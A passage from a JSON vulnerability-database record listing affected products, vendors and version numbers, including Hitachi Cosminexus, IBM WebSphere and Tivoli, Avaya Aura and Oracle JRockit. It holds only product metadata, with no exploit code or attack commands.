"ibm", "version": "6.3" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.6" }, { "model": "cosminexus client 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus primary server base 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.25" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.0" }, { "model": "ucosminexus client 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jdk 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "runtimes for java technology sr8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-00" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "cosminexus developer professional 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "jrockit r28.0.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "cosminexus primary server base 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "cosminexus developer light 06-50-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "jrockit r27.6.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "jrockit r27.6.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "jre 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.23" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "rational insight ifix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "cosminexus client 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "ucosminexus developer (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-00" }, { "model": "ucosminexus client 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2143" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus application server enterprise 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "web sphere real time service refresh", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "37" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-00" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "ucosminexus service platform (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service architect (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "junos space r1.8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus primary server base 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "cosminexus developer professional 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.13" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-00" }, { "model": "jdk 0 03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "manager", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "111.7" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.29" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.37" }, { "model": "java se embedded 7u45", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "lotus quickr for websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "cosminexus application server 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus primary server base 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "ucosminexus developer standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "ucosminexus application server standard (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.0" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus operator (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cosminexus application server enterprise 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "websphere sensor events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "junos space 14.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "cosminexus application server 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "jrockit r27.1.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.31" }, { "model": "cosminexus studio 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "jrockit r28.1.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus application server enterprise 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "system networking switch center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.32" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.31" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.185" }, { "model": "jrockit r27.6.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "jrockit r27.6.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "cosminexus primary server base 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.33" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.45" }, { "model": "ucosminexus primary server base (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "ucosminexus developer light 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "runtimes for java technology 7.sr7", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "ucosminexus developer professional for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "jre beta", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus developer light 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-10" }, { "model": "cosminexus primary server base 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.22" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "ts7740 virtualization engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3957-v07" }, { "model": "jrockit r27.7.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "cosminexus developer professional 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus application server standard 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.1" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus application server standard 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus developer professional 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "jdk 0 09", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "cosminexus developer standard 06-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus primary server base 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.29" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "ucosminexus client (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.10" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-50" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": 